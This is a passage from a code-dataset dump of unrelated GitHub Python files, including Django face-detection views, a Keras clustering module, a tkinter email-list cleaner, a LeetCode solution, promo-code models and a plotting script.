test_Y_en\n","repo_name":"CrazyPrisoner/multi_models","sub_path":"logistic_regression/logistic_regression_input.py","file_name":"logistic_regression_input.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35990288697","text":"from UI import *\r\nfrom functools import partial\r\n\r\ndef checkChangesMade(cls):\r\n if cls.changes == True:\r\n reply = QtGui.QMessageBox.question(cls, \"Save Changes?\", \"Would you like to save your changes?\"\r\n ,QtGui.QMessageBox.Yes, QtGui.QMessageBox.No, QtGui.QMessageBox.Cancel)\r\n if reply == QtGui.QMessageBox.Yes:\r\n 
cls.saveChanges()\r\n cls.changes = False\r\n return 0\r\n elif reply == QtGui.QMessageBox.Cancel:\r\n return 1\r\n else:\r\n cls.changes = False\r\n return 0\r\n else: \r\n cls.changes = False\r\n return 0\r\n \r\ndef initializeChangeTracking(cls,widget):\r\n if isinstance(widget,QtGui.QLineEdit):\r\n widget.textEdited.connect(partial(markAsChanged,cls))\r\n elif isinstance(widget, QtGui.QCheckBox):\r\n widget.clicked.connect(partial(markAsChanged,cls))\r\n elif isinstance(widget, QtGui.QComboBox):\r\n widget.activated.connect(partial(markAsChanged,cls))\r\n elif isinstance(widget, QtGui.QTextEdit):\r\n widget.undoAvailable.connect(partial(markAsChanged,cls))\r\n \r\n\r\ndef markAsChanged(cls):\r\n cls.changes = True\r\n \r\ndef populateTableRow(table, r, cols):\r\n for c, col in enumerate(cols):\r\n if isinstance(col, QtGui.QTableWidgetItem):\r\n table.setItem(r,c,col)\r\n else:\r\n table.setCellWidget(r,c,col)\r\n \r\n\r\ndef stateGenerator():\r\n states = \"\"\"Alabama,AL\r\nAlaska,AK\r\nArizona,AZ\r\nArkansas,AR\r\nCalifornia,CA\r\nColorado,CO\r\nConnecticut,CT\r\nDelaware,DE\r\nFlorida,FL\r\nGeorgia,GA\r\nHawaii,HI\r\nIdaho,ID\r\nIllinois,IL\r\nIndiana,IN\r\nIowa,IA\r\nKansas,KS\r\nKentucky,KY\r\nLouisiana,LA\r\nMaine,ME\r\nMaryland,MD\r\nMassachusetts,MA\r\nMichigan,MI\r\nMinnesota,MN\r\nMississippi,MS\r\nMissouri,MO\r\nMontana,MT\r\nNebraska,NE\r\nNevada,NV\r\nNew Hampshire,NH\r\nNew Jersey,NJ\r\nNew Mexico,NM\r\nNew York,NY\r\nNorth Carolina,NC\r\nNorth Dakota,ND\r\nOhio,OH\r\nOklahoma,OK\r\nOregon,OR\r\nPennsylvania,PA\r\nRhode Island,RI\r\nSouth Carolina,SC\r\nSouth Dakota,SD\r\nTennessee,TN\r\nTexas,TX\r\nUtah,UT\r\nVermont,VT\r\nVirginia,VA\r\nWashington,WA\r\nWest Virginia,WV\r\nWisconsin,WI\r\nWyoming,WY\"\"\".split(\"\\n\")\r\n for state in states:\r\n yield state.split(\",\")","repo_name":"dwhite91/Rudy","sub_path":"ScreenControl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37283274768","text":"#\n# @lc app=leetcode id=1771 lang=python3\n#\n# [1771] Maximize Palindrome Length From Subsequences\n#\n# https://leetcode.com/problems/maximize-palindrome-length-from-subsequences/description/\n#\n# algorithms\n# Hard (31.69%)\n# Likes: 111\n# Dislikes: 5\n# Total Accepted: 3K\n# Total Submissions: 9.3K\n# Testcase Example: '\"cacb\"\\n\"cbba\"'\n#\n# You are given two strings, word1 and word2. You want to construct a string in\n# the following manner:\n# \n# \n# Choose some non-empty subsequence subsequence1 from word1.\n# Choose some non-empty subsequence subsequence2 from word2.\n# Concatenate the subsequences: subsequence1 + subsequence2, to make the\n# string.\n# \n# \n# Return the length of the longest palindrome that can be constructed in the\n# described manner. 
If no palindromes can be constructed, return 0.\n# \n# A subsequence of a string s is a string that can be made by deleting some\n# (possibly none) characters from s without changing the order of the remaining\n# characters.\n# \n# A palindrome is a string that reads the same forward as well as backward.\n# \n# \n# Example 1:\n# \n# \n# Input: word1 = \"cacb\", word2 = \"cbba\"\n# Output: 5\n# Explanation: Choose \"ab\" from word1 and \"cba\" from word2 to make \"abcba\",\n# which is a palindrome.\n# \n# Example 2:\n# \n# \n# Input: word1 = \"ab\", word2 = \"ab\"\n# Output: 3\n# Explanation: Choose \"ab\" from word1 and \"a\" from word2 to make \"aba\", which\n# is a palindrome.\n# \n# Example 3:\n# \n# \n# Input: word1 = \"aa\", word2 = \"bb\"\n# Output: 0\n# Explanation: You cannot construct a palindrome from the described method, so\n# return 0.\n# \n# \n# Constraints:\n# \n# \n# 1 <= word1.length, word2.length <= 1000\n# word1 and word2 consist of lowercase English letters.\n# \n#\n\n# @lc code=start\nclass Solution:\n def longestPalindrome(self, word1: str, word2: str) -> int:\n s = word1 + word2\n m, n = map(len, (word1, word2))\n ans = 0\n\n dp = [[0] * (m + n) for _ in range(m + n)]\n for i in range(m + n - 1, -1, -1):\n dp[i][i] = 1\n for j in range(i + 1, m + n):\n if s[i] == s[j]:\n dp[i][j] = 2 + dp[i + 1][j - 1]\n if i < m and j >= m:\n ans = max(ans, dp[i][j])\n else:\n dp[i][j] = max(dp[i + 1][j], dp[i][j - 1])\n\n return ans\n\n\n\n \n# @lc code=end\n\n","repo_name":"chenxu0602/LeetCode","sub_path":"1771.maximize-palindrome-length-from-subsequences.py","file_name":"1771.maximize-palindrome-length-from-subsequences.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12118558975","text":"import os\nimport tkinter as tk\nfrom tkinter import messagebox, filedialog\n\ndef compare_and_delete_bad_emails(bad_emails_file, all_emails_file):\n with open(bad_emails_file, 'r', encoding='utf-8') as f:\n bad_emails = set(f.read().splitlines())\n\n with open(all_emails_file, 'r', encoding='utf-8') as f:\n all_emails = f.read().splitlines()\n\n deleted_emails = []\n updated_emails = []\n\n for email in all_emails:\n if email in bad_emails:\n deleted_emails.append(email)\n else:\n updated_emails.append(email)\n\n with open(all_emails_file, 'w', encoding='utf-8') as f:\n f.write('\\n'.join(updated_emails))\n\n with open('deleted.txt', 'w', encoding='utf-8') as f:\n f.write('\\n'.join(deleted_emails))\n\n num_deleted_emails = len(deleted_emails)\n messagebox.showinfo(\"Cleanup Complete\", f\"Emails cleaned up!\\nDeleted {num_deleted_emails} email(s) and saved them to deleted.txt.\")\n\ndef browse_all_emails():\n file_path = filedialog.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n all_emails_entry.delete(0, tk.END)\n all_emails_entry.insert(tk.END, file_path)\n\ndef browse_bad_emails():\n file_path = filedialog.askopenfilename(filetypes=[(\"Text files\", \"*.txt\")])\n bad_emails_entry.delete(0, tk.END)\n bad_emails_entry.insert(tk.END, file_path)\n\ndef execute_comparison():\n all_emails_path = all_emails_entry.get()\n bad_emails_path = bad_emails_entry.get()\n\n if not os.path.exists(all_emails_path):\n messagebox.showerror(\"File Not Found\", f\"File not found: {all_emails_path}\")\n return\n\n if not os.path.exists(bad_emails_path):\n messagebox.showerror(\"File Not Found\", f\"File not found: {bad_emails_path}\")\n return\n\n if os.path.exists('deleted.txt'):\n 
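# --- Illustrative aside (not part of the surrounding records): intuition for
# the interval DP in the palindrome record above. With s = word1 + word2,
# dp[i][j] is the longest palindromic subsequence of s[i..j]; the answer only
# counts matches s[i] == s[j] with i < m <= j, which forces at least one
# character from each word. For word1 = "cacb", word2 = "cbba":
# s = "cacbcbba"; pairing s[1] = 'a' with s[7] = 'a' contributes
# 2 + dp[2][6], and dp[2][6] ("cbcbb") = 3 (e.g. "bcb"), giving the reported
# answer 5 ("abcba").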
os.remove('deleted.txt')\n print(\"Found old deleted.txt file and cleaned it.\")\n\n compare_and_delete_bad_emails(bad_emails_path, all_emails_path)\n\n\nwindow = tk.Tk()\nwindow.title(\"Compare and Delete Bad Emails\")\nwindow.geometry(\"400x250\")\n\n\nall_emails_label = tk.Label(window, text=\"All Emails File:\")\nall_emails_label.pack(pady=10)\n\nall_emails_entry = tk.Entry(window, width=40)\nall_emails_entry.pack(pady=5)\n\nbad_emails_label = tk.Label(window, text=\"Bad Emails File:\")\nbad_emails_label.pack(pady=10)\n\nbad_emails_entry = tk.Entry(window, width=40)\nbad_emails_entry.pack(pady=5)\n\nbuttons_frame = tk.Frame(window)\nbuttons_frame.pack()\n\nbrowse_all_emails_button = tk.Button(buttons_frame, text=\"Browse All Emails\", command=browse_all_emails)\nbrowse_all_emails_button.pack(side=tk.LEFT, padx=5)\n\nbrowse_bad_emails_button = tk.Button(buttons_frame, text=\"Browse Bad Emails\", command=browse_bad_emails)\nbrowse_bad_emails_button.pack(side=tk.LEFT, padx=5)\n\nexecute_button = tk.Button(window, text=\"Execute\", command=execute_comparison)\nexecute_button.configure(bg=\"blue\", fg=\"white\")\nexecute_button.pack(pady=10)\n\nwindow.mainloop()\n","repo_name":"chumachenkoo/EmailCleaner","sub_path":"email_cleaner.py","file_name":"email_cleaner.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17859766618","text":"import time\nimport cv2\nimport numpy as np\n\nfrom django.shortcuts import render, reverse, redirect\nfrom django.views.generic import CreateView\nfrom django.http import HttpResponse, StreamingHttpResponse\n\nfrom facedetection.tf_face.recognition import FaceCV, RecognizeFace\n\nfrom .forms import AddFaceForm\nfrom .models import EmbeddingsModel\n\nfrom cvision import settings\n\nface_cv = FaceCV()\nface_recon = RecognizeFace()\n\nvideo = cv2.VideoCapture(0)\n\n\ndef raw_face_feed():\n while True:\n ret, frame = video.read()\n raw_face_feed.frame = frame\n frame = cv2.imencode('.jpg', frame)[1].tostring()\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n\ndef frame_feed():\n while True:\n ret, frame = video.read()\n frame = face_cv.analyze_frame(frame, include_body=settings.INCLUDE_BODY,\n skip_frames=settings.SKIP_FRAMES, include_identity=True)\n frame = cv2.imencode('.jpg', frame)[1].tostring()\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n # time.sleep(0.05)\n\n\ndef read_video():\n with open(settings.VIDEO_PATH, 'rb') as file:\n bytes_video = file.read()\n return bytes_video\n\n\nclass AddNewFaceView(CreateView):\n template_name = 'facedetection/add_face.html'\n form_class = AddFaceForm\n\n def get(self, request, *args, **kwargs):\n form = self.form_class()\n context = {\"form\": form}\n return render(request, template_name=self.template_name, context=context)\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n model = form.save(commit=False)\n\n embedding = face_recon.create_embedding(raw_face_feed.frame)\n\n if embedding:\n model.embedding = embedding\n model.save()\n\n context = {}\n return render(request, template_name=self.template_name, context=context)\n return redirect(reverse('facedetection:add-face'))\n\n\nclass DetectFaceView(CreateView):\n template_name = 'facedetection/detect_face.html'\n\n def get(self, request, *args, **kwargs):\n context = {}\n return render(request, template_name=self.template_name, 
context=context)\n\n def post(self, request, *args, **kwargs):\n context = {}\n return render(request, template_name=self.template_name, context=context)\n\n\nclass StreamRawFaceView(CreateView):\n def get(self, request, *args, **kwargs):\n return StreamingHttpResponse(raw_face_feed(), 'multipart/x-mixed-replace; boundary=frame')\n\n\nclass StreamFaceView(CreateView):\n\n def get(self, request, *args, **kwargs):\n return StreamingHttpResponse(frame_feed(), 'multipart/x-mixed-replace; boundary=frame')\n","repo_name":"diyor28/cvproject","sub_path":"facedetection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41850305751","text":"\"\"\"\nFile containing methods for unsupervised clustering of time series\n\"\"\"\nimport random\n\nimport numpy as np\nimport scipy.spatial.distance as ssd\nfrom keras import regularizers\nfrom keras.layers import Dense\nfrom keras.layers import Input\nfrom keras.models import Model\nfrom keras.optimizers import SGD\nfrom sklearn.cluster import AgglomerativeClustering, KMeans\nfrom tslearn.metrics import cdist_dtw\nfrom tslearn.utils import to_time_series, to_time_series_dataset\n\nfrom analyzer.metrics import calculate_metrics\nfrom preprocessing.gen_input import get_gaussian, select_data\nfrom preprocessing.variables import variables\n\nrandom.seed(1)\n\nfrom clustering.DECLayer import DECLayer\n\n\ndef to_timeseries_set(df, var):\n ids = list(df['studyID'].unique())\n selected_ids = random.sample(ids, 10)\n print(len(ids))\n ts = []\n empty = 0\n count = 0\n for Id in selected_ids:\n count += 1\n sub_df, stop = select_data(df, Id, var)\n if len(sub_df.index) > 1:\n x = sub_df.loc[sub_df['value_name'] == variables[var]['Name']]['Reltime']\n y = sub_df.loc[sub_df['value_name'] == variables[var]['Name']]['value']\n _, y_pred, _ = get_gaussian(x, y, stop, var)\n y_pred = to_time_series(y_pred)\n ts.append(y_pred)\n\n dat = to_time_series_dataset(ts)\n print(dat.shape)\n print(\"nr ids: \", count)\n return dat, empty\n\n\ndef to_distances(ts_dataset):\n m = cdist_dtw(ts_dataset)\n m = ssd.squareform(m)\n return m\n\n\ndef cluster_hierarchical_n(d_matrix, n_classes):\n clustering = AgglomerativeClustering(n_clusters=n_classes, affinity='precomputed', linkage='complete').fit(d_matrix)\n return clustering.labels_\n\n\ndef cluster_hierarchical(feature_array, n_classes):\n clustering = AgglomerativeClustering(n_clusters=n_classes, linkage='complete').fit(feature_array)\n return clustering.labels_\n\n\ndef cluster_kmeans(feature_array, n_classes):\n clustering = KMeans(n_clusters=n_classes).fit(feature_array)\n return clustering.labels_\n\n\ndef target_distribution(q):\n weight = q ** 2 / q.sum(0)\n return (weight.T / weight.sum(1)).T\n\n\ndef dec_cluster(encoder, feature_array, y, n_classes):\n clustering_layer = DECLayer(n_classes, name='clustering')(encoder.output)\n model = Model(inputs=encoder.input, outputs=clustering_layer)\n model.compile(optimizer=SGD(0.01, 0.9), loss='kld')\n\n kmeans = KMeans(n_clusters=n_classes, n_init=20)\n y_pred = kmeans.fit_predict(encoder.predict(feature_array))\n y_pred_last = np.copy(y_pred)\n\n model.get_layer(name='clustering').set_weights([kmeans.cluster_centers_])\n\n loss = 0\n index = 0\n maxiter = 8000\n batch_size = 256\n update_interval = 140\n index_array = np.arange(feature_array.shape[0])\n\n tol = 0.01 # tolerance threshold to stop training\n\n for ite in range(int(maxiter)):\n if ite % 
update_interval == 0:\n q = model.predict(feature_array, verbose=0)\n p = target_distribution(q) # update the auxiliary target distribution p\n\n # evaluate the clustering performance\n y_pred = q.argmax(1)\n if y is not None:\n acc, ari, loss, nmi = calculate_metrics(loss, y, y_pred)\n print('Iter %d: acc = %.5f, nmi = %.5f, ari = %.5f' % (ite, acc, nmi, ari), ' ; loss=', loss)\n\n # check stop criterion - model convergence\n delta_label = np.sum(y_pred != y_pred_last).astype(np.float32) / y_pred.shape[0]\n y_pred_last = np.copy(y_pred)\n if ite > 0 and delta_label < tol:\n print('delta_label ', delta_label, '< tol ', tol)\n print('Reached tolerance threshold. Stopping training.')\n break\n idx = index_array[index * batch_size: min((index + 1) * batch_size, feature_array.shape[0])]\n loss = model.train_on_batch(x=feature_array[idx], y=p[idx])\n index = index + 1 if (index + 1) * batch_size <= feature_array.shape[0] else 0\n\n q = model.predict(feature_array, verbose=0)\n p = target_distribution(q) # update the auxiliary target distribution p\n\n # evaluate the clustering performance\n y_pred = q.argmax(1)\n if y is not None:\n acc, ari, loss, nmi = calculate_metrics(loss, y, y_pred)\n print('Acc = %.5f, nmi = %.5f, ari = %.5f' % (acc, nmi, ari), ' ; loss=', loss)\n\n return y_pred, q\n\n\ndef cluster_mlp_autoencoder(feature_array, n_classes, y=None, neurons_h=64, neurons_e=8, epochs=500, batch_size=64):\n input_arr = Input(shape=(feature_array.shape[1],))\n encoded = Dense(neurons_h, activation='relu', activity_regularizer=regularizers.l1(10e-5))(input_arr)\n encoded = Dense(neurons_e, activation='relu')(encoded)\n\n decoded = Dense(neurons_h, activation='relu')(encoded)\n decoded = Dense(feature_array.shape[1], activation='sigmoid')(decoded)\n\n autoencoder = Model(input_arr, decoded)\n encoder = Model(input_arr, encoded)\n\n autoencoder.compile(optimizer='adam', loss='mean_squared_error')\n\n autoencoder.fit(feature_array, feature_array,\n epochs=epochs,\n batch_size=batch_size,\n shuffle=True)\n\n y_pred, y_proba = dec_cluster(encoder, feature_array, y, n_classes)\n\n return y_pred, y_proba\n","repo_name":"J1C4F8/SICS_DEC","sub_path":"clustering/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"23528105206","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('tiles', '0024_remove_tile_in_stock'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Portfolio',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('user', models.ForeignKey(verbose_name='Portfolio', to=settings.AUTH_USER_MODEL, related_name='portfolio')),\n ],\n ),\n migrations.AddField(\n model_name='tile',\n name='customized',\n field=models.BooleanField(verbose_name='Customized', default=False),\n ),\n migrations.AddField(\n model_name='tile',\n name='portfolio',\n field=models.ForeignKey(verbose_name='Portfolio', to='tiles.Portfolio', blank=True, related_name='tiles', null=True),\n ),\n 
]\n","repo_name":"rogergaitan/granadatiles","sub_path":"granadatiles_project/apps/tiles/migrations/0025_auto_20151204_2313.py","file_name":"0025_auto_20151204_2313.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5878765038","text":"import sys\nimport os\nimport numpy as np\nimport pickle\nimport argparse\nfrom zosapi.util import extractZernikeCoefficents\n\n\"\"\"\nTest the models on a sample data\n\"\"\"\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-f\", \"--file\", help=\"path of the file contaning the zernike coefficient (from Zemax configuration)\")\n args = parser.parse_args()\n\n filename = args.file\n coefficients = extractZernikeCoefficents(filename)\n\n X = coefficients[:16]\n model_class = pickle.load(open(\"models/rfc_model.pkl\", \"rb\"))\n\n reg0 = pickle.load(open(\"models/reg0.pkl\", \"rb\"))\n reg1 = pickle.load(open(\"models/reg1.pkl\", \"rb\"))\n reg2 = pickle.load(open(\"models/reg2.pkl\", \"rb\"))\n reg3 = pickle.load(open(\"models/reg3.pkl\", \"rb\"))\n\n print('Proabability of misalignment of each component (with specific parameter in each component):-')\n prob = model_class.predict_proba(X.reshape(1, -1))[0] * 100\n\n elements = ['Primary Mirror', 'Secondary Mirror', 'Lens', 'CCD']\n regmodels = [reg0, reg1, reg2, reg3]\n\n print()\n for i in range(4):\n print(\"%s -> %0.2f %%\" % (elements[i], prob[i]))\n comp_prob = regmodels[i].predict(X.reshape(1, -1))[0]\n\n print('Decenter in X:', comp_prob[0])\n print('Decenter in Y:', comp_prob[1])\n print('Tilt about X:', comp_prob[2])\n print('Tilt about Y:', comp_prob[3])\n print('-----------------------')\n print()\n","repo_name":"sashank27/Aulign","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18705082980","text":"from setuptools import setup\n\npackage_name = 'bag_recorder'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=[package_name],\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='cjc',\n maintainer_email='christianjc_09@yahoo.com',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'bag_recorder = bag_recorder.bag_recorder:main',\n ],\n },\n)\n","repo_name":"twaddellberkeley/SpaceCAL","sub_path":"src/bag_recorder/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"859340622","text":"from django.db import models\nfrom mptt.models import MPTTModel, TreeForeignKey\n\n# Create your models here.\n\n\nclass BaseModel(models.Model):\n created_at = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n updated_at = models.DateTimeField(auto_now=True, null=True, blank=True)\n is_active=models.BooleanField(default=True)\n class Meta:\n abstract = True\n \n\nclass PromoCode(BaseModel):\n user = models.CharField(max_length=255, null=True, blank=True)\n promo_code = models.CharField(max_length=255, unique=True)\n discount = models.IntegerField()\n \n def __str__(self):\n return f'{self.promo_code} | 
{self.discount}'\n \n class Meta:\n verbose_name_plural = \"Promo Codes\"\n ordering = [\"-created_at\"]\n \nclass BotUsers(BaseModel):\n telegram_id = models.IntegerField(unique=True)\n telegram_full_name = models.CharField(max_length=255, null=True, blank=True)\n telegram_username = models.CharField(max_length=255, null=True, blank=True)\n telegram_phone_number = models.CharField(max_length=20, null=True, blank=True)\n promo_code = models.ForeignKey(PromoCode, on_delete=models.CASCADE, null=True, blank=True, to_field=\"promo_code\")\n \n def __str__(self):\n return f'{self.telegram_id} | {self.telegram_full_name}'\n \n class Meta:\n verbose_name_plural = \"Bot Users\"\n ordering = [\"-created_at\"]\n \n \nclass Order(BaseModel):\n check_id = models.CharField(max_length=255, null=True, blank=True)\n user = models.ForeignKey(BotUsers, on_delete=models.CASCADE, to_field=\"telegram_id\", related_name=\"user_orders\")\n promo_code = models.CharField(max_length=35, null=True, blank=True)\n discount = models.IntegerField(null=True, blank=True)\n full_name = models.CharField(max_length=255, null=True, blank=True)\n phone_number = models.CharField(max_length=20, null=True, blank=True)\n email = models.EmailField(null=True, blank=True)\n total_price = models.IntegerField()\n total_price_with_discount = models.IntegerField(null=True, blank=True)\n is_paid = models.BooleanField(default=False)\n \n def __str__(self):\n return f'{self.user} | {self.total_price_with_discount}'\n \n class Meta:\n verbose_name_plural = \"Orders\"\n ordering = [\"-created_at\"]\n \n def save(self, *args, **kwargs):\n if self.promo_code:\n discount = PromoCode.objects.get(promo_code=self.promo_code).discount\n self.discount = discount\n self.total_price_with_discount = self.total_price - discount\n \n else:\n self.total_price_with_discount = self.total_price\n super(Order, self).save(*args, **kwargs)\n \n def telegram_id(self):\n return self.user.telegram_id","repo_name":"jaloliddin1006/videocoursebot","sub_path":"backend/main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8713381950","text":"# Standard libraries\nimport numpy as np\nimport pandas as pd\n\n# Keras and Tensorflow\nimport tensorflow as tf\nimport keras\n\n# saving to cloud storage\nfrom datetime import datetime\nfrom google.cloud import storage\nfrom custom_libraries import gcloud_storage #local py file\n\n\ndef save_model(model, model_tags = [],return_df=False, model_notes = \"\", loss = \"\", optimizer = \"\", dim = \"\", epochs = 0, train_size = 0, validation_size = 0):\n \"\"\"\n Save model in the designated root folder\n Add a row to the model_records.csv with information about the current training run\n Keyword arguments:\n model -- keras model\n \"\"\"\n \n # get the current time\n d = datetime.utcnow()\n timestamp = d\n time_name = d.strftime(\"%Y-%m-%dT%H%M%S\")\n\n # set folder paths and other saving specs\n root = 'models/'\n save_as_type = 'h5' # can choose 'h5' or 'tf'\n model_records_path = root+'model_records.csv'\n model_name = time_name+'_model'+'.'+save_as_type\n model_path = root+model_name\n \n \n # model attributes\n # added the below as input parameters\n# dim = dim\n# train_size = 1\n# validation_size = 1 \n# epochs = 1\n# optimizer = 1\n # train_data_class_imbalance = \n\n layers = []\n num_layers = len(layers)\n\n # create a unique set of tags, include tensorflow and keras\n model_tags = 
set([x.lower() for x in model_tags + ['tensorflow','keras']])\n\n # model effectiveness \n score = 1\n \n # training information\n total_time = 1\n \n data = {\n # general\n 'timestamp': [timestamp],\n 'model_notes': [model_notes],\n # model attributes\n 'dim': [dim],\n 'train_size': [train_size],\n 'validation_size': [validation_size],\n 'epochs': [epochs],\n 'optimizer': [optimizer],\n 'num_layers': [num_layers],\n 'model_tags': [model_tags],\n 'layers': [layers],\n # model effectiveness\n# 'loss': [loss],\n # added below\n 'score': [score],\n # training specification\n # saving information\n 'model_name': [model_name],\n 'model_path': [model_path]\n }\n\n# for attribute in model.metrics_names:\n# try:\n# data[attribute] = model[attribute]\n# except:\n# print(\"model.\"+attribute+\" is not a valid parameter\")\n \n # save the data to a dictionary\n temp_df = pd.DataFrame.from_dict(data)\n \n # attempt to amend the previous csv. If not available, create a new one\n \n# try:\n# load from google\n# except:\n# model_records_path = root + \"model_records_conflicting_\" + time_name + \".csv\"\n\n try:\n df = pd.read_csv(model_records_path)\n df = pd.concat([df,temp_df],sort=False)\n except:\n df = temp_df\n finally:\n df.reset_index(drop=True,inplace=True)\n \n # save df to csv\n df.to_csv(model_records_path,index=False)\n \n # trying with save_model instead of model.save\n keras.models.save_model(model, model_path)\n \n# # save csv to cloud\n# try:\n# upload_blob(\"fi-capstone-data\",model_path,model_path)\n# upload_blob(\"fi-capstone-data\",model_records_path,model_records_path)\n# except:\n# print(\"MODEL AND RECORDS NOT SAVED TO CLOUD\")\n \n\n if return_df:\n return df\n \n \n\ndef load_model(root = 'models/', records_output = True, model_output = False, model_file_path = \"\"):\n \"\"\"load previous models\n Output:\n df of records of previous models (if records_output == True and model_output == False)\n .h5 file of specifified model (if records_output == False and model_output == True)\n df of records, .h5 of mode (if records_output == True and model_output == True)\n \n Key arguments:\n root = root folder - defaults to 'models/'\n records_output: determines whether the records_df is output\n model_output: determines whether the model .h5 file is output\n model_file_path: file path of model, required when model_output = True\n \"\"\"\n\n model_records_path = root+'model_records.csv'\n df = pd.read_csv(model_records_path)\n if not model_output:\n return df\n else:\n \n model = tf.keras.models.load_model(model_file_path)\n if records_output:\n return df, model\n else:\n return model","repo_name":"RumTumTum/capstone","sub_path":"custom_libraries/file_saving.py","file_name":"file_saving.py","file_ext":"py","file_size_in_byte":4314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73254146725","text":"from django.contrib.auth.views import LoginView\nfrom django.urls import path\nfrom . 
import views\n\napp_name = 'patient'\n\nurlpatterns = [\n    path('patientsignup/', views.patient_signup_view, name='patientsignup'),\n    path('patientlogin/', LoginView.as_view(template_name='patient/patientlogin.html'), name='patientlogin'),\n    path('patient-dashboard', views.patient_dashboard_view,name='patient-dashboard'),\n    path('make-requests', views.make_request_view,name='make-requests'),\n    path('my-request', views.my_request_view,name='my-request'),\n]\n","repo_name":"tarun3154/blood-donate","sub_path":"bloodBank/patient/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37556877358","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport sys\n\ndf = pd.read_csv('Human_mark.csv')\n\ndf_100 = df[df['threshold'] == 100]\n\ny = sys.argv[1]\n\ntools = df_100['tool'].unique()\nfig, ax = plt.subplots(figsize=(12, 8))\n\ncolors = {'smoove':'orangered','genomestrip':'pink','manta':'aqua', 'VISTA':'black','parl':'magenta','surv':'purple','jasmine':'lightblue',\n          'octopus':'coral','delly':'darkorange'}\n\n\nlabel_mapping = {\n    'jasmine': 'Jasmine*',\n    'octopus': 'Octopus',\n    'VISTA': 'VISTA*',\n    'parl': 'Parliament2*',\n    'delly': 'DELLY',\n    'surv': 'SURVIVOR*',\n    'smoove': 'Smoove',\n    'manta': 'Manta'\n}\n\nfor i, tool in enumerate(tools):\n    tool_df = df_100[df_100['tool'] == tool]\n    if y == \"f-score\":\n        ax.plot(tool_df['strain'], tool_df['f-score'], color=colors[tool.replace(\" \",\"\")], label=tool)\n        ax.scatter(tool_df['strain'], tool_df['f-score'], color=colors[tool.replace(\" \",\"\")], s=10)\n    if y == \"sensitivity\": \n        ax.plot(tool_df['strain'], tool_df['sensitivity'], color=colors[tool.replace(\" \",\"\")], linestyle='dashed')\n        ax.scatter(tool_df['strain'], tool_df['sensitivity'], color=colors[tool.replace(\" \",\"\")], s=10)\n\n    if y == \"precision\" :\n        ax.plot(tool_df['strain'], tool_df['precision'], color=colors[tool.replace(\" \",\"\")], linestyle='dotted')\n        ax.scatter(tool_df['strain'], tool_df['precision'], color=colors[tool.replace(\" \",\"\")], s=10)\n\nax.set_xlabel('Human strains')\ny = y.capitalize()\nax.set_ylabel(str(y))\n\nax.set_ylim(0, 1)\n\n# Fall back to the raw tool name for tools missing from label_mapping (e.g. 'genomestrip') instead of raising KeyError\ntool_legend_elements = [Line2D([0], [0], color=colors[tool.replace(\" \",\"\")], label=label_mapping.get(tool.replace(\" \",\"\"), tool)) for i, tool in enumerate(tools)]\nline_legend_elements = [\n    Line2D([0], [0], color='black', label='F-Score'),\n    Line2D([0], [0], color='black', linestyle='dashed', label='Sensitivity'),\n    Line2D([0], [0], color='black', linestyle='dotted', label='Precision')\n]\n\n# Create a separate legend box for the tool names\ntool_legend = ax.legend(handles=tool_legend_elements, loc='upper left', bbox_to_anchor=(1, 0.5))\n\n# Create a separate legend box for F-score, Precision, and Sensitivity\nline_legend = ax.legend(handles=line_legend_elements, loc='lower center', bbox_to_anchor=(0.5, -0.2), ncol=3)\n\n# Add the line legend and 